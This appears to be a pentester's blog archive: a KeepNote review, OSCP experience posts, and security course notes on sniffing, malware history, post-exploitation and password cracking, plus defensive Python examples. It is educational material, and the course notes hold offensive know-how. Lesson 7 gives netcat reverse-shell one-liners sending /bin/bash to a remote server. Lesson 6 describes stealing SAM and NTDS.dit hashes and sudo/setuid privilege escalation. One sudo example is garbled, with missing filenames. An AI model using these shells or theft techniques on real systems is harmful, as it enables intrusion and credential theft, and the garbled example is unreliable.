Running KeepNote on a Mac

During my PWK training, I absolutely fell in love with KeepNote.  I used it extensively for tracking all the different networks, all the hosts in that network, all the different scan results and loot I’d collect on each, and also general notes about attack vectors I had tried, what worked, what didn’t work, what to explore, little code snippets or Linux commands for easy copy-and-paste use later, links to helpful articles…you get the picture.

Unfortunately, KeepNote isn’t very well-maintained.  As of this Fourth of July, the latest versions uploaded to the main site are five years old.  The original developer did put it on Github two years ago, but there haven’t been many pull requests accepted since then and he obviously doesn’t have the time to keep up with it anymore.  Totally understandable, but it sucks because I haven’t found a good, well-maintained replacement for it.

And believe me, I’ve tried!  Evernote, Bear, nvALT, desktop wikis like Zim, the macOS Notes app, and on and on.  No one else is doing, or even offering an option to do, the same kind of UI layout.  I don’t know why, but the three-pane arrangement of KeepNote just hits the spot for me.  The outline on the left side, submenu on top right, and notes section on bottom left; no one else arranges their app like this.


For real, this is my happy place.

OSCP Update

Look what came in the mail a few weeks ago!

For the curious, it took about a month for them to send the paper certificate and a little hard-plastic credit card sized version via DHL courier.  They send you an email asking where you want it mailed, just in case you’ve switched apartments or something in between registering and passing the exam.

Also, I realized in my previous OSCP review that I forgot to mention a few things.  I’ll list them here and also add them as an update to the original review post.

My OSCP Experience

Update (11/4/2016): added a few bits back in from this post

A few weeks ago, I “tried harder” and was awarded the Offensive Security Certified Professional (OSCP) certification.

As many people before me have done, I decided I’d post a little writeup of my experience with the Pentesting With Kali (PWK) online training and taking the OSCP exam (twice).

As you probably know by now, the OSCP is Offensive Security’s certification for penetration testing using the Linux distribution they maintain, Kali Linux.   The accompanying course, Pentesting With Kali (PWK), gets you a PDF lab guide and a series of instruction videos covering the different topics of the guide, from basic network enumeration to writing buffer overflow exploits.  You’re also purchasing VPN access to their hands-on lab environment of dozens of different vulnerable hosts for you to probe and exploit.  To attain the OSCP certification, you take a hands-on exam in which you’re given VPN access to a special exam network and are allotted 24 hours to compromise as many systems as possible, plus an additional 24 hours to write up and submit your exam penetration test report.

I signed up for the 90-day course, bought a one-month extension after I ran out of time (mostly for going back over machines to write the huge lab report…more on that later), I bombed my first attempt at the exam, purchased a two-week extension in order to bone up on some stuff and get a retest attempt, then passed it on my second try.

The Cost, Signing Up, and Getting your Employer to Pay For It

I’ve wanted to take OffSec’s training for a long time and I should’ve just sucked it up, ponied up the money, and taken it years ago.  I fought for over a year at my previous employer to get them to finance it.  I was ready to give up arguing with them and buy it myself before I landed in my current job.  Thankfully, where I work now has a healthy training budget for its pentesters and all I had to do was put it on the corporate card.

CNS 320 Lesson 9 – Sniffing

Lesson 9 – Sniffing

  • In the old days, most LANs used hubs.  When a packet would come into the LAN, the hub would send it to everyone.  If the packet said its destination was your network card’s MAC address, you would take it and process it.  If it *didn’t* have your MAC, you were supposed to politely ignore it.  Yeah…you can guess how this ends.
  • Nowadays, LANs use “switches” instead of hubs.  Switches are smarter and keep track of which MAC address is hooked into which port on the switch.  That way, it only sends the packet to the computer it’s intended for.  This makes sniffing other people’s traffic more difficult…but we’ll see how attackers can get around this.
  • NOTE: later, we’ll talk more in depth about wireless networks.  Since they use radio signals that propagate out in all directions, they inherently have many of the same problems as hubs do.

  • Rlogin and rsh are old remote access protocols for logging into Linux/Unix servers.  They and telnet are all plain-text and have mostly been replaced by SSH, which is encrypted.  Rlogin/rsh usually operates on TCP port 513.
  • NNTP = Network News Transfer Protocol, the protocol used for sharing Usenet posts.  TCP 119 is reserved for it.

  • Network taps sit inline between switches, routers, and/or hosts and listen in on the packets being sent.  Troubleshooting tools and intrusion detection systems (IDS) are two types of tools that often employ taps in order to monitor the network.
  • Port mirroring (SPAN, as it’s called in Cisco products) is a feature of the router or switch itself and can more intelligently filter what data to intercept.

  • Intranet Spoofing: Acting as a device on the same internal network
  • Internet Spoofing: Acting as a device on the Internet
  • Proxy Server DNS Poisoning: Modifying the DNS entries on a proxy server so the user is redirected to a different host system
  • DNS Cache Poisoning: Modifying the DNS entries on any system so the user is redirected to a different host

  • Ping method: if you suspect a certain IP address is a sniffer, send it a ping packet with its valid IP address but the wrong MAC address.  If it responds anyway, it’s the sniffer.
  • ARP method: send out a non-broadcast ARP message.  Next, send a broadcast ping packet with your IP address but a different MAC address.  Only a machine that learned your correct MAC address from the sniffed ARP frame will be able to respond to the broadcast ping request.
  • Source-route method: send out a ping, but with a loose source route so that it will be routed through another machine on your network segment.  Most computers won’t route packets like this, so if you get a response, it’s likely the machine is running in promiscuous mode.
  • Decoy method: this method involves sending false information over the wire (such as fake username/password combos) and seeing if anyone acts on it.
  • Reverse DNS method: many sniffer programs will automatically perform reverse DNS lookups of the addresses they sniff.  If you start seeing two machines with remarkably similar DNS traffic, one could be sniffing the other.
  • Latency method: flood the network with traffic.  The sniffer will start to creak under the strain.  If you see a machine on the network suddenly having very high latency when responding to requests, it might be the one sniffing.
  • TDR: TDRs (time-domain reflectometers) are tools for testing electrical cables.  They are capable of detecting hardware taps and sniffers.

  • Port security, or MAC filtering, will lock a specific MAC address to a specific port on a switch.  This helps prevent ARP spoofing.
  • You could also go to the trouble of making a static ARP table and ignoring any spoofers sending out unsolicited ARP replies.
  • The most common method is to use network IDS/IPS products that look for suspicious traffic, like floods of unsolicited ARP replies or large volumes of DNS traffic.
  • The best way to deal with sniffers is to make them pointless.  If you use public-key encryption (like TLS), it won’t matter if you’re being sniffed; the eavesdropper won’t be able to read your packets anyway.
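The third bullet above is the one that scales: look for the ARP symptoms of a spoofer rather than for the spoofer.  Here is an added example (not part of the lesson) of the two checks an IDS rule would apply to a capture: an IP address advertised by more than one MAC, and a burst of replies that nobody asked for.  The capture is a constructed list of (time, opcode, sender IP, sender MAC, target IP) tuples; the two-second window and the flood threshold of five are assumptions you would tune for your own network.

```python
"""Spot the ARP symptoms an IDS/IPS watches for: one IP claimed by several
MACs, and a flood of unsolicited ARP replies from a single sender.
Added example, not from the lesson; the capture format is constructed."""
from collections import Counter, defaultdict

# Constructed sample capture: (seconds, opcode, sender_ip, sender_mac, target_ip)
# opcode 1 = request ("who has X?"), 2 = reply ("X is at MAC"). All addresses invented.
SAMPLE_ARP = [
    (0.0, 1, "10.0.0.5", "aa:aa:aa:aa:aa:05", "10.0.0.1"),  # host asks for the gateway
    (0.1, 2, "10.0.0.1", "aa:aa:aa:aa:aa:01", "10.0.0.5"),  # gateway answers
    (1.0, 1, "10.0.0.7", "aa:aa:aa:aa:aa:07", "10.0.0.5"),
    (1.1, 2, "10.0.0.5", "aa:aa:aa:aa:aa:05", "10.0.0.7"),
] + [
    # six replies for 10.0.0.1 from a different MAC, with nobody asking
    (5.0 + i * 0.1, 2, "10.0.0.1", "de:ad:be:ef:00:01", "10.0.0.5") for i in range(6)
]


def ip_mac_conflicts(records):
    """Return {ip: {mac, ...}} for every IP advertised by more than one MAC."""
    seen = defaultdict(set)
    for _ts, _op, sender_ip, sender_mac, _target in records:
        seen[sender_ip].add(sender_mac)
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


def unsolicited_replies(records, window=2.0):
    """Return replies with no matching request in the preceding `window` seconds."""
    pending = defaultdict(list)  # ip being asked for -> timestamps of open requests
    out = []
    for ts, op, sender_ip, sender_mac, target_ip in sorted(records):
        if op == 1:
            pending[target_ip].append(ts)
        elif op == 2:
            recent = [t for t in pending[sender_ip] if ts - t <= window]
            pending[sender_ip] = recent
            if recent:
                recent.pop(0)  # this reply answers the oldest live request
            else:
                out.append((ts, sender_ip, sender_mac))
    return out


def reply_floods(records, window=2.0, threshold=5):
    """Senders that emitted at least `threshold` unsolicited replies."""
    counts = Counter(mac for _ts, _ip, mac in unsolicited_replies(records, window))
    return {mac: n for mac, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("IP/MAC conflicts:", ip_mac_conflicts(SAMPLE_ARP))
    print("reply floods:", reply_floods(SAMPLE_ARP))
```

On the sample, the gateway’s legitimate reply is matched to the request that preceded it, while the six replies from the second MAC have no request to pair with and the same IP now maps to two MACs, which is exactly the pattern a static ARP table or port security would refuse.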

  • In the labs for this lesson, I would have my students work through a tcpdump tutorial.  Most of them were already very familiar with Wireshark, but few had used tcpdump on the command line.
  • After that, we’d pair up and play with sniffing traffic.  I would start them out with the relatively-simple arpspoof utility and then start using the more advanced ettercap.


CNS320 Lesson 8 – Malware

Lesson 8 – Malware

  • Blackmail and extortion run the gamut from encrypting your files and holding them for ransom to stealing nude pics and making you pay the attacker not to blast them all over the internet.

  • Don’t rely on slowdown and excessive CPU/RAM usage as your prime indicator…that’s usually just a sign that your computer is an old piece of shit.

  • The malware author first designs the malware
  • Then the malware replicates across networks and machines to victim computers
  • The malware then launches and performs whatever action is intended (holding files ransom, stealing sensitive info, installing keystroke loggers, enrolling the machine in a botnet, just trashing it, etc.)
  • Eventually, researchers and antivirus companies detect the virus in the wild, categorize it, and start building signatures for it
  • When that signature info is incorporated into AV products, antivirus can now recognize it…
  • …and start to eliminate the malware

  • Boot sector viruses target the boot sector or Master Boot Record of hard drives, bootable floppies, CDs, USBs, etc.
  • File viruses infect files (duh).  Adobe PDF is a popular vector.
  • Program viruses infect executables.
  • Network viruses (according to the book) are viruses that spread over the network, usually via email.  It’s not really clear how this is different from a worm.
  • Source code viruses actually look for C, Java, or other source code on a machine and alter it to include malicious code.  These viruses are extremely rare.
  • Macro viruses, the bane of the 90’s, are written in the “macro language” of another application…such as an embedded macro in a Word or Excel document.  The Melissa virus was one of the earliest and most widespread of macro viruses.  Macro viruses have mostly tailed off in popularity.
  • Multipartite viruses utilize more than one of the above methods to infect and spread.

  • TSR viruses usually load themselves into memory and then delete any files or binaries they used to get there in the first place.
  • Cavity viruses hide in the unused whitespace inside certain applications and file formats.
  • A tunneling virus is a virus that attempts to get underneath anti-virus software before it can detect malicious code.  It launches itself beneath the anti-virus program, goes to the operating system’s interrupt handlers, and intercepts them, thus avoiding detection.  Interception programs, which sit in the background of the operating system and catch viruses, are disabled while a tunneling virus runs.
  • Stealth viruses also use various means to evade antivirus, hooking system calls and interrupts and changing them so that nothing alerts the AV software.  The difference between a stealth virus and a tunneling virus is that stealth viruses intercept everything, whereas tunneling viruses intercept only the AV’s system calls.
  • Camouflage viruses crudely try to masquerade as a legitimate program.  They’re trivial for AV to find and kill.
  • Encrypted viruses come with a decryption module and then try to encrypt the bulk of the viral code and any infected binaries in order to evade signature-based AV.
  • Polymorphic and metamorphic viruses are similar in that both modify the underlying virus code with each iteration.  The difference is that metamorphic code will randomly re-write every part of itself, whereas polymorphic viruses usually have a mutation engine (or decryption module) that stays untouched and unmodified, making polymorphics easier to catch by AV.

  • Creeper was an experimental, benign self-replicating program unleashed on DEC PDP-10 computers running the TENEX operating system.  Reaper was a program written to get rid of Creeper instances, making it the first anti-virus.
  • Rabbit was the first example of a “fork bomb,” a virus that keeps forking new processes of itself until it uses up all the system resources and DoS’s the box.
  • Fred Cohen was an engineering student at the University of Southern California who first coined the term “computer virus” with a proof-of-concept program and an accompanying research paper in 1983.
  • Elk Cloner was invented as a prank by teenage computer enthusiast Rick Skrenta.  It was a boot sector virus that infected Apple II floppy disks.  It was harmless, only displaying a taunting message to users, but it could occasionally ruin disks if it accidentally overwrote the wrong part of a floppy’s boot sector.
  • Brain was the first boot sector virus to infect MS-DOS machines, written by Pakistani programmers and brothers Basit and Amjad Alvi.  It was originally written as an anti-piracy program, but unexpectedly spread to other disks.  Mikko Hyppönen of F-Secure tracked down the two brothers in 2011; they still own an IT business in Lahore.
  • The Morris Worm was unleashed on the ARPANet by then Cornell University student Robert Tappan Morris.  Morris said he did it as a way to gauge the size of the Internet, not to cause harm.  The worm spread using several possible methods; it would try to exploit known vulnerabilities in common Unix programs like sendmail, finger, and rlogin and would also try to remotely log in by guessing weak passwords.  The worm itself was harmless; it would simply get into a new machine, then look for network neighbors and spread to them too.
  • Morris had written it so that, if it detected there was already a copy of the worm installed, it wouldn’t reinfect…except every seventh time, it would install another copy of itself, ostensibly as protection against false positives or people trying to fool his worm and keep it from spreading.  With enough time, as the worm reinfected the same hosts continuously, it turned into a massive widespread DoS attack.
  • Morris became the first person convicted under the then-new CFAA law.  He eventually served three years’ probation, did 400 hours of community service, and was fined over $10,000.
  • Morris went on to found several Silicon Valley start-ups and is currently a tenured professor at MIT.

  • A floppy disk of the Morris worm’s source code in the Computer History Museum in Mountain View, CA

  • Pretty sure Michelangelo was the inspiration for the “Da Vinci virus” in the movie Hackers.

  • The Code Red worm exploited flaws in Microsoft IIS web servers.  Nimda was another devastating worm/file-infector combo that used other means to propagate, but could also exploit backdoors left behind by old Code Red infections.
  • Beast was one of the first reverse shell RATs for Windows.
  • Slammer was a DoS worm that exploited a buffer overflow in Microsoft SQL Server and Desktop Engine to crash Windows machines.
  • Blaster spread via a buffer overflow in the RPC service on TCP port 135 and would try to use infected hosts to DDoS the Windows Update website with a SYN flood.
  • Sasser was another big DoS worm that exploited LSASS (the Local Security Authority Subsystem Service) in Windows 2000 and XP.
  • Zeus is one of the longest-lived bank credential-stealing Trojans, keeping alive through changes and variants such as the newer GameOver ZeuS offshoot and merging code with the SpyEye trojan.
  • Conficker was a worm that spread through numerous Windows infection vectors.
  • Stuxnet and Duqu may very well be the first and some of the most successful cyberweapons. Leaks from inside the US government allege it was developed as part of a US/Israeli joint operation to target and destroy Iranian uranium enrichment centrifuges.
  • Blackhole is an example of an “exploit kit” or “crimeware kit,” that allows low-skilled cybercriminals to put together bank credential-stealing or botnet-enrolling trojans of their own.
  • Flashback made waves as one of the first widespread Mac OS X pieces of malware.  It used a vulnerability in Java and spread through malicious websites.
  • Flame is another cyberweapon, supposedly developed by the NSA and Israel.
  • CryptoLocker kicked off the era of encryption ransomware.  It and its copycats would infect a machine, encrypt all the user’s personal files, then hold them for ransom.  If the user paid the ransom (usually an amount set in an anonymous cryptocurrency like Bitcoin), the malware creator would give them the decryption key so they could access their files again.

  • Glance over this list, because you may see a question or two about suspicious ports on your exam.

  • Air-gapping means the machine is not connected to other machines over network connections.


CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are available for Windows and other OS’s too.
  • Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others.

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each of them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
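To make the known-cover and known-message cases concrete, here is an added example (not from the lesson) of the simplest steganographic method, least-significant-bit replacement, over a constructed byte “image”, followed by the two analyses.  With the cover in hand, the analyst sees that every altered byte changed by exactly 1 and that the changes stop at a fixed offset, which both fingerprints LSB embedding and bounds the payload length; with the message in hand as well, re-running the suspected algorithm and comparing confirms it.  The cover bytes, seed and message are all constructed for the demo.

```python
"""Toy LSB steganography over a constructed byte "image", plus the known-cover
and known-message checks from the list above. Added example, not from the
lesson; the cover data and message are constructed."""
import random


def embed_lsb(cover, message):
    """Write message bits, MSB first, into the least significant bit of each byte."""
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("message too long for cover")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(stego, nbytes):
    """Read nbytes of payload back out of the LSBs (what a stego-only analyst tries)."""
    bits = [b & 1 for b in stego[: nbytes * 8]]
    return bytes(
        int("".join(str(bit) for bit in bits[i : i + 8]), 2)
        for i in range(0, nbytes * 8, 8)
    )


def known_cover_attack(cover, stego):
    """With both cover and stego: list changed positions and the size of each change.
    LSB embedding leaves only +/-1 deltas confined to a prefix of the file."""
    changed = [i for i, (a, b) in enumerate(zip(cover, stego)) if a != b]
    deltas = {abs(a - b) for a, b in zip(cover, stego) if a != b}
    return changed, deltas


def estimate_payload_bytes(cover, stego):
    """Lower bound on the payload length: the last altered byte shows how far the
    embedding ran (trailing bits that happened to match the cover are invisible)."""
    changed, _ = known_cover_attack(cover, stego)
    return (changed[-1] // 8) + 1 if changed else 0


def known_message_attack(cover, stego, message):
    """Given the message too, confirm the suspected algorithm reproduces the stego."""
    return embed_lsb(cover, message) == stego


def make_cover(n=256, seed=7):
    """Constructed 'grayscale' cover: n pseudo-random pixel values."""
    rng = random.Random(seed)
    return bytes(rng.randrange(256) for _ in range(n))


if __name__ == "__main__":
    cover = make_cover()
    msg = b"flag{lsb}"
    stego = embed_lsb(cover, msg)
    changed, deltas = known_cover_attack(cover, stego)
    print("changed bytes:", len(changed), "deltas:", deltas)
    n = estimate_payload_bytes(cover, stego)
    print("recovered:", extract_lsb(stego, n))
```

Note the caveat in estimate_payload_bytes: a bit that already matched the cover leaves no trace, so the diff gives a lower bound, not the exact length; real-image LSB detection uses statistics over the whole file (for instance the distribution of even/odd pixel pairs) for the stego-only case, which this toy does not attempt.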

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  There are also some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  netcat-openbsd is the version you’ll most commonly find preinstalled on Debian, Ubuntu, Red Hat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to stop hackers leaving backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
    1.)  mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)  mkfifo pipe && nc <remote server> <port> < pipe | /bin/bash &> pipe
    The second one is better, because it also pipes stderr back to you (so you can see error messages).


This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge you to try to solve them on your own.  The De-ICE ones do have a hint page on the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

CNS320 Lesson 6 – Exploitation

Lesson 6 – Exploitation

  • If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wire.  Services like telnet, FTP, and badly-written websites can transmit passwords in plain text over unencrypted channels.
  • The other option is, if the network doesn’t allow you to sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff passwords or other sensitive info.  More on this subject to come.
  • A complement to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
  • An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

  • Offline attacks mean that you’ve captured password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fixed-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows, MD5 for most web apps, etc.), and if you get a match against the stolen hash, then you know that word or string of characters is the password.
  • A dictionary attack is just what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  It’s the most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, which is a dump of millions of real-world passwords that were used by users of a popular gaming site that was compromised in 2009.  You’ll also find other wordlists and dictionaries in other apps’ directories in the /usr/share tree.
  • Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simply a matter of whether it’ll take minutes or centuries to finally guess your password.
  • Hybrid attacks are anything in between.
  • Rainbow tables (AKA precomputed hashes) are just huge lists of millions or billions of different password hashes for you to throw against a certain system (like a list of every possible NTLM hash to try against Windows or every MD5 hash to try against a web app’s stolen password database).  The idea is that you spend the time up-front generating all the possible hashes so that you can then quickly use them against multiple targets.
  • Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
  • Rule-based attacks are where you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”.
  • A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel might each be trying to crack it, each of them divvying up the workload.  This is usually facilitated with a botnet.
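The defensive lesson hiding in the list above is that dictionary and rainbow-table attacks depend on the hash being fast and unsalted.  Here is an added example (not from the lesson) that shows both halves in a few lines: a precomputed MD5 lookup table finds a stolen unsalted hash with no hashing at attack time, while a per-user random salt and a slow KDF (PBKDF2-SHA256 here) force every guess to be recomputed against each record, so neither the table nor work done on one user carries over to the next.  The mini wordlist and the iteration counts are constructed for the demo; production settings should be much higher.

```python
"""Why the offline attacks above work on unsalted, fast hashes and why a salted,
slow hash changes the economics. Added example, not from the lesson; the
wordlist and test password are constructed."""
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for something like rockyou.txt.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2016"]


def md5_hex(password):
    """Unsalted MD5, the "most web apps" case from the lesson."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup(words):
    """Precompute hash -> plaintext once; this is the idea behind rainbow tables."""
    return {md5_hex(w): w for w in words}


def lookup_unsalted(stolen_hash, table):
    """A dictionary hit costs one table lookup; no hashing happens at attack time."""
    return table.get(stolen_hash)


def make_salted(password, iterations=50_000):
    """Store salt + iteration count + PBKDF2-SHA256 digest instead of a bare hash."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest


def verify_salted(password, salt, iterations, digest):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


def guesses_needed(words, salt, iterations, digest):
    """How many PBKDF2 evaluations a dictionary run needs against ONE salted record;
    the precomputed table cannot be reused because the salt is per user."""
    for n, word in enumerate(words, start=1):
        if verify_salted(word, salt, iterations, digest):
            return n
    return None


if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    stolen = md5_hex("letmein")
    print("unsalted md5 lookup:", lookup_unsalted(stolen, table))
    salt, it, digest = make_salted("letmein")
    print("salted: guesses needed =", guesses_needed(WORDLIST, salt, it, digest))
    # Same password, fresh salt -> different digest, so no cross-user matching either.
    print("digests differ:", make_salted("letmein")[2] != digest)
```

Two things to notice when you run it: the unsalted lookup is instant no matter how many users share the hash, and the salted path costs iterations-times-wordlist PBKDF2 calls per user, which is the cost multiplier that makes a leaked database expensive to crack rather than impossible.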

  • Shoulder surfing is when an attacker tries to get close to a victim as they are inputting their password and watches the keys pressed.
  • Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user types, which an attacker can then read to learn the victim’s password.
  • To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

  • John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
  • Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
  • Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
  • Ophcrack and L0phtcrack are both famous Linux-based tools for cracking Windows LM and NTLM hashes.
  • RainbowCrack is, you guessed it, used to generate rainbow tables and crack hashes against them.
  • There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

  • THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
  • Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
  • CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
  • Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

  • The SAM is well-known for having local usernames and hashes stored in it; if you also have the SYSTEM and SECURITY hives with it, you also get access to cached Active Directory hashes, password history, and other valuable intel.
  • Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
  • SAM, SYSTEM, and SECURITY are stored in C:\WINDOWS\system32\config\ and the NTDS.dit file is stored in C:\WINDOWS\ntds\
  • You can’t normally get to the SAM, SYSTEM, and SECURITY files while a Windows machine is turned on, but you can steal them out of memory or from Volume Shadow Service (VSS) backup copies, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

  • There are lots of tools that will try to dump the SAM file, either out of memory or out of Volume Shadow Service (VSS) backup copies, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
  • chntpw is a Linux utility you can use, once you’ve mounted a hard drive with Windows on it, to steal hashes or overwrite them with your own.
  • NTDSXtract is for stealing hashes from NTDS.dit files.
  • Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
  • Volume Shadow Service (VSS) is a Windows service that takes backup snapshots of the running Windows OS.  If you have admin-level privileges, you can often find backup copies of the SAM and other important files in here.  There are numerous tools available to automate this.
  • As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way.

  • WMIC = Windows Management Instrumentation Command-Line
  • Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” would list out all the hotfix and security patches applied to that Windows install

  • As you’ll see, there are a lot of things that can go wrong with Linux, especially in regard to privilege escalation via setuid or sudo.

  • When Linux systems crash, they often “dump core” and dump the contents of RAM into a file, for the purpose of diagnosing what caused the crash.
  • Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain keyfiles that they use to login to other servers.

  • Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them; hence all the different places you have to look.

  • Hence why dd is sometimes said to stand for “disk destroyer” 🙂

  • Example: you hacked an account with sudo rights, but all it can do is use sudo to execute a script called “”.  Just delete the script (rm, then link the old name to a shell (ln /bin/bash, then run it with sudo permission (sudo ./ and bam, you have root!
  • Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.

  • Normally, in Linux and Unix, when you run a program, it runs with your own level of permissions.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems.  Instead of giving everyone root permissions, you can just give the program the “setuid” access right so that when normal users run it, it’s as if root was running it.
  • An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.
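The conditions behind the sudo, cron and setuid escalations in this lesson are all things a file-permission audit can find before an attacker does: a script that root runs from cron but that other users can write, and files carrying the setuid/setgid bits.  Here is an added example (not from the lesson) of such an audit.  It classifies raw stat modes, walks a directory tree for flagged files, parses system-crontab lines (the seven-field format with a user column, plus the @reboot shorthand) and reports root-run commands whose program file is group- or world-writable.  The throwaway tree, scripts and crontab lines in run_demo are constructed; the function name, paths and the decision to treat group-writable as a finding are assumptions of this example.

```python
"""Audit for the Linux privilege-escalation conditions discussed above:
setuid/setgid files and writable scripts that root runs from cron.
Added example, not from the lesson; the demo tree and crontab are constructed."""
import os
import stat
import tempfile


def classify_mode(mode):
    """Return the flags worth reviewing for a raw st_mode value."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    if mode & stat.S_IWOTH:
        flags.append("world-writable")
    return flags


def audit_tree(root):
    """Walk root and map each flagged regular file to its flags."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = classify_mode(st.st_mode)
            if flags:
                findings[path] = flags
    return findings


def parse_crontab_lines(lines):
    """Yield (user, command) from system-crontab text (/etc/crontab, /etc/cron.d/*)."""
    entries = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value environment line
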